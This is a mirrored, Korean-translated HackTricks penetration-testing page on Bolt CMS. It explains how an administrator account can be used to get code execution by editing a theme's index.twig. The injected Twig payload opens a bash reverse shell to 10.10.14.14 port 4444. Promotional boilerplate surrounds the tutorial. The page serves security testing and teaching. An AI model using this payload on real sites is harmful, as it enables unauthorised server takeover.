Mirrors/hacktricks

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 21:24:06 +00:00

Translator d76fc64880 Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

2024-05-05 22:46:17 +00:00

3.4 KiB

Raw Blame History

Bolt CMS

제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team 전문가)!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 PDF 형식의 HackTricks를 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 굿즈를 구매하세요
The PEASS Family를 발견하세요, 저희의 독점 NFTs 컬렉션
💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

RCE

관리자로 로그인한 후 (로그인 프롬프트에 액세스하려면 /bot로 이동), Bolt CMS에서 RCE를 얻을 수 있습니다:

Configuration -> View Configuration -> Main Configuration을 선택하거나 URL 경로 /bolt/file-edit/config?file=/bolt/config.yaml로 이동
테마의 값을 확인하세요

File management -> View & edit templates을 선택하세요
이전 단계에서 찾은 테마 베이스를 선택하고 index.twig를 선택하세요 (base-2021의 경우)
제 경우 URL 경로는 /bolt/file-edit/themes?file=/base-2021/index.twig입니다
템플릿 인젝션 (Twig)을 통해 이 파일에 페이로드를 설정하세요. 예: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
그리고 변경 사항을 저장하세요

Maintenance -> Clear the cache에서 캐시를 지우세요
다시 일반 사용자로 페이지에 액세스하면 페이로드가 실행됩니다

제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team 전문가)!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 PDF 형식의 HackTricks를 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 굿즈를 구매하세요
The PEASS Family를 발견하세요, 저희의 독점 NFTs 컬렉션
💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.